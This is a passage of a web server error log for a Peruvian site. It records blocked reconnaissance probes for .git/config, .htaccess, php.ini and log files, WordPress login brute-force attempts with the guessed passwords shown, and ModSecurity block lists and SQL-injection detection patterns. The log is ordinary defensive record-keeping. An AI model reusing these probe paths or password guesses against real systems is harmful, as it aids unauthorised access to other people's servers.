rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /src/services/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33304 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /marketing/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33305 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/mailer-config/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33285 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/aws-ses/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22344#22344: *33306 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/smtp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33286 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /store/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:49 [error] 22343#22343: *33287 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/smtp/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33288 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /test/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33307 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33289 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33309 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /queue/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33290 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /src/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33308 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /gateway/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33291 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /live/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33292 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /core/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33293 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /demo/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33294 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/email/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33311 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /src/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33310 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33295 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33313 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/billing/api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33296 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /notifications/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33297 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /integrations/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33314 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /core/notifications/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33312 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33315 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33298 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /legacy/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33299 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /repos/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33316 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33317 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /scheduled/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33318 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/email/aws/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33319 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/modules/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33320 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/email/sendgrid/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33321 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /node_modules/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33322 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /core/services/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33323 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33325 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33326 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33355 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33356 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /v1/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33324 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/services/notifications/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33327 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33328 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /v2/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33329 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /private/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33330 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /core/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33331 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22343#22343: *33357 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /dist/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33332 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /repository/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33333 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /user/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33334 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33335 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /tools/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33336 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /utils/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33338 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /jobs/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33337 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33339 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/auth/api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33340 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33341 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /common/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33342 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /src/services/notifications/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33343 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /new/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33344 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wp-content/themes/custom-theme/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33345 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /m/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33346 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /backend/services/workers/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33347 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /internal/mail/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33348 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33350 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /developer/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33349 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/user/api/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33351 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /services/mailjet/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33352 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /cron/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33353 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /staging/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 08:04:50 [error] 22344#22344: *33354 access forbidden by rule, client: 13.38.95.50, server: investigacionperu.com, request: "GET /communications/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/24 09:59:39 [error] 22344#22344: *34458 access forbidden by rule, client: 193.41.206.24, server: mail.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/24 14:00:24 [error] 22343#22343: *38045 access forbidden by rule, client: 18.216.126.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 24 21:21:22.528286 2025] [:error] [pid 22919:tid 140219005236992] [client 193.41.206.24:41270] [client 193.41.206.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/httpd.conf"] [unique_id "Z5RKovjIHQyKQmv6VwUAIQAAAMw"] [Fri Jan 24 21:21:40.889972 2025] [:error] [pid 3690:tid 140219013629696] [client 193.41.206.24:41326] [client 193.41.206.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config/php.ini"] [unique_id "Z5RKtNRme0BgOj-2mk7ttAAAAUs"] 2025/01/24 21:21:45 [error] 22344#22344: *44586 access forbidden by rule, client: 193.41.206.24, server: investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "investigacionperu.com" [Fri Jan 24 21:22:54.172963 2025] [:error] [pid 3690:tid 140218980058880] [client 193.41.206.24:41430] [client 193.41.206.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php_errors.log"] [unique_id "Z5RK_tRme0BgOj-2mk7tvgAAAU8"] [Sat Jan 25 02:39:01.986734 2025] [autoindex:error] [pid 22919:tid 140219063985920] [client 52.172.206.108:50406] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jan 25 06:13:01.991900 2025] [:error] [pid 6899:tid 139916478510848] [client 202.29.30.120:54176] [client 202.29.30.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:coalesce\\\\b|root\\\\@))" at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "140"] [id "950908"] [rev "2"] [msg "SQL Injection Attack."] [data "Matched Data: root@ found within ARGS:pwd: root@123"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z5THPW0qiAVE-tE-J5zYSQAAAMU"] [Sat Jan 25 09:02:54.829828 2025] [:error] [pid 6369:tid 139916478510848] [client 5.189.181.60:58914] [client 5.189.181.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s+and\\\\s*?=\\\\W)|(?:\\\\(\\\\s*?select\\\\s*?\\\\w+\\\\s*?\\\\()|(?:\\\\*\\\\/from)|(?:\\\\+\\\\s*?\\\\d+\\\\s*?\\\\+\\\\s*?@)|(?:\\\\w[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(?:[-+=|@]+\\\\s*?)+[\\\\d(])|(?:coalesce\\\\s*?\\\\(|@@\\\\w+\\\\s*?[ ..." at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "233"] [id "981249"] [msg "Detects chained SQL injection attempts 2/2"] [data "Matched Data: @@123! found within ARGS:pwd: Investigacionperu@@123!"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "Z5TvDsF_5Ln1pP9hKV2SOgAAAEU"] [Sat Jan 25 09:34:06.745535 2025] [:error] [pid 14868:tid 139916470118144] [client 42.194.146.217:59742] [client 42.194.146.217] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5T2XtaOSzSoWqezIjCCPQAAAQY"], referer: https://investigacionperu.com/xmlrpc.php [Sat Jan 25 09:34:06.745644 2025] [:error] [pid 14868:tid 139916470118144] [client 42.194.146.217:59742] [client 42.194.146.217] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5T2XtaOSzSoWqezIjCCPQAAAQY"], referer: https://investigacionperu.com/xmlrpc.php [Sat Jan 25 09:34:07.815293 2025] [:error] [pid 14868:tid 139916557838080] [client 42.194.146.217:59744] [client 42.194.146.217] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5T2X9aOSzSoWqezIjCCPgAAAQQ"], referer: https://investigacionperu.com/xmlrpc.php [Sat Jan 25 09:34:07.815376 2025] [:error] [pid 14868:tid 139916557838080] [client 42.194.146.217:59744] [client 42.194.146.217] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "151"] [id "960912"] [rev "1"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z5T2X9aOSzSoWqezIjCCPgAAAQQ"], referer: https://investigacionperu.com/xmlrpc.php [Sat Jan 25 11:30:28.254627 2025] [:error] [pid 14868:tid 139916394583808] [client 193.41.206.36:35046] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/httpd.conf"] [unique_id "Z5URpNaOSzSoWqezIjCEFQAAAQ8"] [Sat Jan 25 11:30:51.094853 2025] [:error] [pid 6369:tid 139916335834880] [client 193.41.206.36:35098] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config/php.ini"] [unique_id "Z5URu8F_5Ln1pP9hKV2S0gAAAFY"] 2025/01/25 11:30:57 [error] 6331#6331: *57539 access forbidden by rule, client: 193.41.206.36, server: investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "investigacionperu.com" [Sat Jan 25 11:32:13.176057 2025] [:error] [pid 6369:tid 139916574623488] [client 193.41.206.36:35208] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php_errors.log"] [unique_id "Z5USDcF_5Ln1pP9hKV2S2QAAAEI"] 2025/01/25 17:47:46 [error] 6332#6332: *61294 access forbidden by rule, client: 54.252.207.52, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/25 17:59:21 [error] 6332#6332: *61391 access forbidden by rule, client: 54.252.207.52, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/25 18:28:21 [error] 6331#6331: *61488 access forbidden by rule, client: 54.252.207.52, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/01/25 18:55:18 [error] 6331#6331: *62204 access forbidden by rule, client: 54.252.207.52, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/25 19:11:50 [error] 6331#6331: *62350 access forbidden by rule, client: 54.252.207.52, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Jan 26 00:04:10.017187 2025] [authz_core:error] [pid 6899:tid 139916428154624] [client 157.245.36.108:48444] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/26 00:04:15 [error] 6332#6332: *64723 access forbidden by rule, client: 157.245.36.108, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jan 26 00:17:06.845448 2025] [authz_core:error] [pid 14868:tid 139916557838080] [client 128.199.182.152:48600] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/26 00:17:14 [error] 6332#6332: *64827 access forbidden by rule, client: 128.199.182.152, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jan 26 02:18:32.655912 2025] [:error] [pid 5511:tid 139916461725440] [client 150.136.112.62:50888] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Jan 26 02:18:45.812614 2025] [:error] [pid 6899:tid 139916352620288] [client 150.136.112.62:50920] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:18:45.822737 2025] [:error] [pid 6370:tid 139916428154624] [client 150.136.112.62:50922] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:19:27.279155 2025] [autoindex:error] [pid 5511:tid 139916361012992] [client 150.136.112.62:51022] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Jan 26 02:19:36.819758 2025] [:error] [pid 5569:tid 139916344227584] [client 150.136.112.62:51044] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Jan 26 02:19:37.707126 2025] [autoindex:error] [pid 